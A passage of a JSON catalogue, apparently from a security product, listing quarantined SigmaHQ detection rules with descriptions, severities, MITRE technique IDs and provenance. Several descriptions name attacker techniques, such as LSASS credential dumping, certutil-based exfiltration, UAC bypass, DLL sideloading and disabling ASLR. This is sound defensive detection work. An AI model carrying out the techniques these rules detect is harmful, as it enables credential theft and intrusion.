query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" } }, { "id": "sigmahq-sigma-e3f673b3-65d1-4d80-9146-466f8b63fa99", "type": "detection", "name": "Suspicious Appended Extension", "description": "Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-appended-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_rename/file_rename_win_ransomware.yml" } }, { "id": "sigmahq-sigma-e3fdf743-f05b-4051-990a-b66919be1743", "type": "detection", "name": "Change User Account Associated with the FAX Service", "description": "Detects a change of the user account associated with the FAX service, to avoid the escalation problem.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/change-user-account-associated-with-the-fax-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e3fdf743-f05b-4051-990a-b66919be1743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml" } }, { "id": "sigmahq-sigma-e402c26a-267a-45bd-9615-bd9ceda6da85", "type": "detection", "name": "Stale Accounts In A Privileged Role", "description": "Identifies when an account has not signed in during the past n days.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stale-accounts-in-a-privileged-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e402c26a-267a-45bd-9615-bd9ceda6da85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml" } }, { "id": "sigmahq-sigma-e40f4962-b02b-4192-9bfe-245f7ece1f99", "type": "detection", "name": "Multifactor Authentication Denied", "description": "The user has indicated they did not initiate the MFA prompt, which could indicate an attacker has the password for the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1078.004", "T1110", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multifactor-authentication-denied.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e40f4962-b02b-4192-9bfe-245f7ece1f99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_mfa_denies.yml" } }, { "id": "sigmahq-sigma-e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "type": "detection", "name": "Potential Edputil.DLL Sideloading", "description": "Detects potential DLL sideloading of \"edputil.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-edputil-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_edputil.yml" } }, { "id": "sigmahq-sigma-e497a24e-9345-4a62-9803-b06d7d7cb132", "type": "detection", "name": "ASLR Disabled Via Sysctl or Direct Syscall - Linux", "description": "Detects actions that disable Address Space Layout Randomization (ASLR) in Linux, including:\n - Use of the `personality` syscall with the ADDR_NO_RANDOMIZE flag (0x0040000)\n - 
Modification of the /proc/sys/kernel/randomize_va_space file\n - Execution of the `sysctl` command to set `kernel.randomize_va_space=0`\nDisabling ASLR is often used by attackers during exploit development or to bypass memory protection mechanisms.\nA successful use of these methods can reduce the effectiveness of ASLR and make memory corruption attacks more reliable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1055.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aslr-disabled-via-sysctl-or-direct-syscall-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e497a24e-9345-4a62-9803-b06d7d7cb132", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_disable_aslr_protection.yml" } }, { "id": "sigmahq-sigma-e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "type": "detection", "name": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE", "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-libcurl-dll-via-gup-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_gup_libcurl.yml" } }, { "id": "sigmahq-sigma-e4a6b256-3e47-40fc-89d2-7a477edd6915", "type": "detection", "name": "System File Execution Location Anomaly", "description": "Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-file-execution-location-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" } }, { "id": "sigmahq-sigma-e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "type": "detection", "name": "Dynamic CSharp Compile Artefact", "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dynamic-csharp-compile-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" } }, { "id": "sigmahq-sigma-e4be5675-4a53-426a-8c81-a8bb2387e947", "type": "detection", "name": "CodeIntegrity - Blocked Image/Driver Load For Policy Violation", "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-image-driver-load-for-policy-violation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4be5675-4a53-426a-8c81-a8bb2387e947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml" } }, { "id": "sigmahq-sigma-e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "type": "detection", "name": "Potentially Suspicious ODBC Driver Registered", "description": "Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious 
location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-odbc-driver-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml" } }, { "id": "sigmahq-sigma-e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "type": "detection", "name": "Disable Windows IIS HTTP Logging", "description": "Detects the disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-iis-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml" } }, { "id": "sigmahq-sigma-e4f93c99-396f-47c8-bb0f-201b1fa69034", "type": "detection", "name": "Potential Data 
Exfiltration Via Audio File", "description": "Detects potential exfiltration attempt via audio file using PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-data-exfiltration-via-audio-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml" } }, { "id": "sigmahq-sigma-e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "type": "detection", "name": "Nohup Execution", "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nohup-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nohup.yml" } }, { "id": 
"sigmahq-sigma-e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "type": "detection", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-windows-firewall-snap-in-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" } }, { "id": "sigmahq-sigma-e54279c7-4910-4e2c-902c-c56a25b549f6", "type": "detection", "name": "Windows AppX Deployment Full Trust Package Installation", "description": "Detects the installation of MSIX/AppX packages with full trust privileges which run with elevated privileges outside normal AppX container restrictions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-appx-deployment-full-trust-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "e54279c7-4910-4e2c-902c-c56a25b549f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxpackaging_server_full_trust_package_installation.yml" } }, { "id": "sigmahq-sigma-e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "type": "detection", "name": "Uncommon Outbound Kerberos Connection", "description": "Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558", "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-outbound-kerberos-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" } }, { "id": "sigmahq-sigma-e54f5149-6ba3-49cf-b153-070d24679126", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e54f5149-6ba3-49cf-b153-070d24679126", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-e55a5195-4724-480e-a77e-3ebe64bd3759", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - PowerShell", "description": "Detects obfuscated PowerShell via the use of MSHTA in scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e55a5195-4724-480e-a77e-3ebe64bd3759", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-e568650b-5dcd-4658-8f34-ded0b1e13992", "type": "detection", "name": "Potential Product Class Reconnaissance Via Wmic.EXE", "description": "Detects the execution of WMIC in order to get a list of firewall, antivirus and antispyware products.\nAdversaries often enumerate security products installed on a system to identify security controls and potential 
ways to evade detection or disable protection mechanisms.\nThis information helps them plan their next attack steps and choose appropriate techniques to bypass security measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-product-class-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e568650b-5dcd-4658-8f34-ded0b1e13992", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml" } }, { "id": "sigmahq-sigma-e56d3073-83ff-4021-90fe-c658e0709e72", "type": "detection", "name": "Gpresult Display Group Policy Information", "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1615" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gpresult-display-group-policy-information.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e56d3073-83ff-4021-90fe-c658e0709e72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" } }, { "id": "sigmahq-sigma-e593cf51-88db-4ee1-b920-37e89012a3c9", "type": "detection", "name": "Potentially Suspicious Rundll32 Activity", "description": "Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-rundll32-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml" } }, { "id": "sigmahq-sigma-e5ac86dd-2da1-454b-be74-05d26c769d7d", "type": "detection", "name": "Windows Default Domain GPO Modification", "description": "Detects modifications to Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\nAdversaries may modify these default GPOs to deploy malicious configurations across the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-default-domain-gpo-modification.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5ac86dd-2da1-454b-be74-05d26c769d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_default_domain_gpo_modification.yml" } }, { "id": "sigmahq-sigma-e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "type": "detection", "name": "Credential Dumping Attempt Via WerFault", "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-attempt-via-werfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_werfault.yml" } }, { "id": "sigmahq-sigma-e5d36acd-acb4-4c6f-a13f-9eb203d50099", "type": "detection", "name": "Active Directory Structure Export Via Csvde.EXE", "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-structure-export-via-csvde-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csvde_export.yml" } }, { "id": "sigmahq-sigma-e5f5c693-52d7-4de5-88ae-afbfbce85595", "type": "detection", "name": "Unsigned .node File Loaded", "description": "Detects the loading of unsigned .node files.\nAdversaries may abuse a lack of .node integrity checking to execute arbitrary code inside of trusted applications such as Slack.\n.node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code.\nThis technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1129", "T1574.001", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-node-file-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e5f5c693-52d7-4de5-88ae-afbfbce85595", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/image_load/image_load_dll_unsigned_node_load.yml" } }, { "id": "sigmahq-sigma-e61e8a88-59a9-451c-874e-70fcc9740d67", "type": "detection", "name": "New DNS ServerLevelPluginDll Installed", "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-dns-serverlevelplugindll-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml" } }, { "id": "sigmahq-sigma-e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "type": "detection", "name": "File Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. 
This can be abused by threat actors and attackers for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_encode.yml" } }, { "id": "sigmahq-sigma-e6313acd-208c-44fc-a0ff-db85d572e90e", "type": "detection", "name": "Network Reconnaissance Activity", "description": "Detects a set of suspicious network related commands often used in recon stages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-reconnaissance-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml" } }, { "id": "sigmahq-sigma-e6474a1b-5390-49cd-ab41-8d88655f7394", 
